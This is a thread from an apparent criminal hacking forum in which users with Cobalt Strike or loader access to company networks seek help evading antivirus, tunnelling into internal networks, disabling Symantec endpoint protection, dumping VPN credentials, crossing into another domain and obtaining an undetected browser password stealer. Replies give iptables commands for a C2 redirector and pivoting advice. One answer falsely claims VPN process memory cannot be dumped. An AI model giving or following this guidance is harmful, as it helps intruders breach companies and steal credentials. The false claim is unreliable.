• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Is it possible to raise a proxy or vpn on the "client" so that you can connect to the company's network from your computer?
Yes, you can start proxies on the infected machines and connect to them, here is an example that BayRob gang used

1670443489332.png


Does this help?
 
Всем привет. Вопрос есть. Сразу уточню, что в пентесте я ноль.
Условно есть лоадер или сессия кобы.
Можно ли поднять на "клиенте" проксю или впн, чтобы можно было к сети компании подключится со своего компа?
Заебали АВ. Вроде лоадер и коба не палятся. Но как тольк пробуешь какой то сплоит заюзать - все нафиг отваливается.
Вот и подумал, что если бы как то можно было бы пробросить сеть на свой комп...
Уточню, что мы отталкиваемся от того, что нестандартыне порты закрыты. То есть в идеале как то это сделать через http.
Читал, но нифига не понял, что как то можно через ngrok.
Заранее спасибо
Прокси в любом с2 и так будет идти через твой канал связи.В кобальте socks 1080 чтобы поднять прокси.Также можно поднять встроенный в кобальт впн.Нгрок это портфорвардинг,тебе скорее всего нужен сокс\впн.
 
Последнее редактирование:
Прокси в любом с2 и так будет идти через твой канал связи.В кобальте socks 1080 чтобы поднять прокси.Также можно поднять встроенный в кобальт впн.Нгрок это портфорвардинг,тебе скорее всего нужен сокс\впн.
Спасибо, попробую.
 
В корпе локальная сеть сегментирована,для связи между сегментами используется FortiSSLVPN .Как мне попасть в другой сегмент сети?Мб можно сдампить креды из памяти процесса впн клиента?
 
Есть доступ к symantec endpoint protection manager
Как отключить АВ на клиентах?Пока вариат только в политике отключить проверки.Мб еще есть варианты более верные ?
 
How can I get to another network segment?
you will need to have permission from the network administrator and the appropriate tools and knowledge to do so safely. Typically, this involves conducting network discovery and mapping to identify the network segments and their boundaries, as well as any potential vulnerabilities or weaknesses that can be exploited. Once you have this information, you can use tools such as port scanners and network analyzers to identify open ports and services on the target network segment, and then use those to gain access

Can I dump the credits from the memory of the VPN client process?
It is not possible to dump the credits from the memory of a VPN client process. VPN client software is designed to securely establish a connection between your device and a VPN server, and does not store or manage any type of credit information. In addition, the memory of a VPN client process is not accessible to external parties, as it is protected by the operating system and the security measures in place on your device.
 
Как в кобальте сделать ,чтобы стейдж пэйлоады работали через другие маяки,а не конектились напрямую к тимсерверу?
Тебе нужна впска с доменом и сертификатом, как это сделать ты разберешься без нашей помощи.
ставишь себе nginx
прописываешь там редирект на свой сервер кобы
Код:
iptables -I INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination cobaltC2ip:443
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl -w net.ipv4.ip_forward=1

вместо cobaltC2ip - ипак кобы
дальше создаешь Beacon HTTPS и в поле call back вписываешь домен своей впски, стартуешь тимсервер и все должно работать
P.S. можно использовать свои сертификаты, но это сложнее
 
Тебе нужна впска с доменом и сертификатом, как это сделать ты разберешься без нашей помощи.
ставишь себе nginx
прописываешь там редирект на свой сервер кобы
Код:
iptables -I INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination cobaltC2ip:443
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl -w net.ipv4.ip_forward=1

вместо cobaltC2ip - ипак кобы
дальше создаешь Beacon HTTPS и в поле call back вписываешь домен своей впски, стартуешь тимсервер и все должно работать
P.S. можно использовать свои сертификаты, но это сложнее
Мне не редиректор нужен.Я хочу чтобы стейдж пэйлоады конектились через другие биконы из локалки к моему тимсерверу.Когда я выбираю в кобальте стейдж пэйлоад,он предлагает мне только http/https листенер,который расположен на тимсервере. A я хочу ,чтобы они конектились к тимсерверу через другой бикон типа smb/tcp.Может быть это можно сделать через портфорвардинг на биконе,но я не знаю как
 
Мне не редиректор нужен.Я хочу чтобы стейдж пэйлоады конектились через другие биконы из локалки к моему тимсерверу.Когда я выбираю в кобальте стейдж пэйлоад,он предлагает мне только http/https листенер,который расположен на тимсервере. A я хочу ,чтобы они конектились к тимсерверу через другой бикон типа smb/tcp.Может быть это можно сделать через портфорвардинг на биконе,но я не знаю как
Если я тебя правильно понял, то тебе нужен pivot listener
 
Если я тебя правильно понял, то тебе нужен pivoting listener
он не работает для стейджеров,я думаю это можно сделать через портфорвардинг,но пока не получается
 
он не работает для стейджеров,я думаю это можно сделать через портфорвардинг,но пока не получается

Ну или бери stageless пейлоад и грузи его каким-нибудь сторонним стейджером если тебе надо :)
 
На доменном компе нашел креды от пользователя другого домена.Между этими доменами траста нет.Есть несколько вопросов:
1.Как такое могло случиться?Как пользователь другого домена авторизовался на машине
2.Как мне авторизоваться в другом домене(компы из другого домена пингуются) с кобальтом?
 
На доменном компе нашел креды от пользователя другого домена.Между этими доменами траста нет.Есть несколько вопросов:
1.Как такое могло случиться?Как пользователь другого домена авторизовался на машине
2.Как мне авторизоваться в другом домене(компы из другого домена пингуются) с кобальтом?
Как очень часто бывает админ обслуживает несколько компаний и поискать комп, то есть доступ к другим сеткам.
По сетке пройдись ручками, все сам прекрасно увидишь.
 
Как использовать в MSF ?
Код:
payload/generic/custom
Только без примеров из гугла, уже искал.И EXE пробовал и команду.
 
UP по
Посоветуйте стилак ,чтобы вытащить пароли из браузеров в консоль на шарпе одним файлом чтобы через execute-assembly юзать.
И поддержу вопрос
Посоветуйте стилак ,чтобы вытащить пароли из браузеров в консоль на шарпе одним файлом чтобы через execute-assembly юзать.
но можно и PS.Что то аналогичное https://www.nirsoft.net/utils/web_browser_password.html
но консольное, с возможностью сохранения, и сбора паролей со всех юзеров.(ну и не таким фудом, в общем кнопку бабло)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх